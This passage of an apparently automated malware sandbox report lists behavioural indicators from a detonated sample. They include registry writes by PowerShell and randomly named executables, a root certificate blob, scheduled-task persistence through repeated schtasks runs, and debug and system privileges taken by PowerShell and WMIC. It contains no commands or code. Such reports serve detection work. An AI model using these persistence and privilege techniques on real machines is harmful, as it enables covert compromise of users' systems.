\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket HhkZqKf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume HhkZqKf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe -
Modifies registry class 9 IoCs
Processes:
msedge.exemsedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children msedge.exe Key created \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children msedge.exe Key created \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" msedge.exe Key created \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage msedge.exe Key created \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe msedge.exe -
Processes:
setup.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5804 schtasks.exe 4656 schtasks.exe 1064 schtasks.exe 5804 schtasks.exe 1456 schtasks.exe 3980 schtasks.exe 2300 schtasks.exe 6140 schtasks.exe 5252 schtasks.exe 5620 schtasks.exe 2424 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exesetup_CU3cRmqhm4.tmpdjminoradequate.exemsedge.exepowershell.exepowershell.exepowershell.exeRP3U09NqkneL.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEHhkZqKf.exepid process 4800 msedge.exe 4800 msedge.exe 3116 msedge.exe 3116 msedge.exe 4916 identity_helper.exe 4916 identity_helper.exe 2884 msedge.exe 2884 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 1408 setup_CU3cRmqhm4.tmp 1408 setup_CU3cRmqhm4.tmp 1112 djminoradequate.exe 1112 djminoradequate.exe 1112 djminoradequate.exe 1112 djminoradequate.exe 2984 msedge.exe 2860 powershell.exe 2860 powershell.exe 4400 powershell.exe 4400 powershell.exe 4400 powershell.exe 2860 powershell.exe 3660 powershell.exe 3660 powershell.exe 3660 powershell.exe 1244 RP3U09NqkneL.exe 1244 RP3U09NqkneL.exe 1244 RP3U09NqkneL.exe 1244 RP3U09NqkneL.exe 1244 RP3U09NqkneL.exe 5128 powershell.exe 5128 powershell.exe 5128 powershell.exe 6024 powershell.exe 6024 powershell.exe 6024 powershell.exe 1112 djminoradequate.exe 1112 djminoradequate.exe 5708 powershell.exe 5708 powershell.exe 5708 powershell.exe 5584 powershell.exe 5584 powershell.exe 5584 powershell.exe 5436 powershell.EXE 5436 powershell.EXE 5436 powershell.EXE 1112 djminoradequate.exe 1112 djminoradequate.exe 5632 HhkZqKf.exe 5632 HhkZqKf.exe 5632 HhkZqKf.exe 5632 HhkZqKf.exe 5632 HhkZqKf.exe 5632 HhkZqKf.exe 5632 HhkZqKf.exe 5632 HhkZqKf.exe 5632 HhkZqKf.exe 5632 HhkZqKf.exe 5632 HhkZqKf.exe 5632 HhkZqKf.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 22 IoCs
Processes:
msedge.exemsedge.exepid process 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exepowershell.exepowershell.exepowershell.EXEpowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 4400 powershell.exe Token: SeDebugPrivilege 2860 powershell.exe Token: SeDebugPrivilege 3660 powershell.exe Token: SeDebugPrivilege 5128 powershell.exe Token: SeDebugPrivilege 6024 powershell.exe Token: SeIncreaseQuotaPrivilege 5376 WMIC.exe Token: SeSecurityPrivilege 5376 WMIC.exe Token: SeTakeOwnershipPrivilege 5376 WMIC.exe Token: SeLoadDriverPrivilege 5376 WMIC.exe Token: SeSystemProfilePrivilege 5376 WMIC.exe Token: SeSystemtimePrivilege 5376 WMIC.exe Token: SeProfSingleProcessPrivilege 5376 WMIC.exe Token: SeIncBasePriorityPrivilege 5376 WMIC.exe Token: SeCreatePagefilePrivilege 5376 WMIC.exe Token: SeBackupPrivilege 5376 WMIC.exe Token: SeRestorePrivilege 5376 WMIC.exe Token: SeShutdownPrivilege 5376 WMIC.exe Token: SeDebugPrivilege 5376 WMIC.exe Token: SeSystemEnvironmentPrivilege 5376 WMIC.exe Token: SeRemoteShutdownPrivilege 5376 WMIC.exe Token: SeUndockPrivilege 5376 WMIC.exe Token: SeManageVolumePrivilege 5376 WMIC.exe Token: 33 5376 WMIC.exe Token: 34 5376 WMIC.exe Token: 35 5376 WMIC.exe Token: 36 5376 WMIC.exe Token: SeIncreaseQuotaPrivilege 5376 WMIC.exe Token: SeSecurityPrivilege 5376 WMIC.exe Token: SeTakeOwnershipPrivilege 5376 WMIC.exe Token: SeLoadDriverPrivilege 5376 WMIC.exe Token: SeSystemProfilePrivilege 5376 WMIC.exe Token: SeSystemtimePrivilege 5376 WMIC.exe Token: SeProfSingleProcessPrivilege 5376 WMIC.exe Token: SeIncBasePriorityPrivilege 5376 WMIC.exe Token: SeCreatePagefilePrivilege 5376 WMIC.exe Token: SeBackupPrivilege 5376 WMIC.exe Token: SeRestorePrivilege 5376 WMIC.exe Token: SeShutdownPrivilege 5376 WMIC.exe Token: SeDebugPrivilege 5376 WMIC.exe Token: SeSystemEnvironmentPrivilege 5376 WMIC.exe Token: SeRemoteShutdownPrivilege 5376 WMIC.exe Token: SeUndockPrivilege 5376 WMIC.exe Token: SeManageVolumePrivilege 5376 WMIC.exe Token: 33 5376 WMIC.exe Token: 34 5376 WMIC.exe Token: 35 5376 WMIC.exe Token: 36 5376 WMIC.exe Token: SeDebugPrivilege 5708 powershell.exe Token: SeDebugPrivilege 5584 powershell.exe Token: SeDebugPrivilege 5436 powershell.EXE Token: SeDebugPrivilege 3424 powershell.exe Token: SeAssignPrimaryTokenPrivilege 5908 WMIC.exe Token: SeIncreaseQuotaPrivilege 5908 WMIC.exe Token: SeSecurityPrivilege 5908 WMIC.exe Token: SeTakeOwnershipPrivilege 5908 WMIC.exe Token: SeLoadDriverPrivilege 5908 WMIC.exe Token: SeSystemtimePrivilege 5908 WMIC.exe Token: SeBackupPrivilege 5908 WMIC.exe Token: SeRestorePrivilege 5908 WMIC.exe Token: SeShutdownPrivilege 5908 WMIC.exe Token: SeSystemEnvironmentPrivilege 5908 WMIC.exe Token: SeUndockPrivilege 5908 WMIC.exe Token: SeManageVolumePrivilege 5908 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 5908 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exesetup_CU3cRmqhm4.tmplNdzzyFPAwOlp5XgSLE.tmpmsedge.exepid process 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 1408 setup_CU3cRmqhm4.tmp 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 3116 msedge.exe 760 lNdzzyFPAwOlp5XgSLE.tmp 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe 5984 msedge.exe -
Suspicious use of SendNotifyMessage 58 IoCs
Processes:
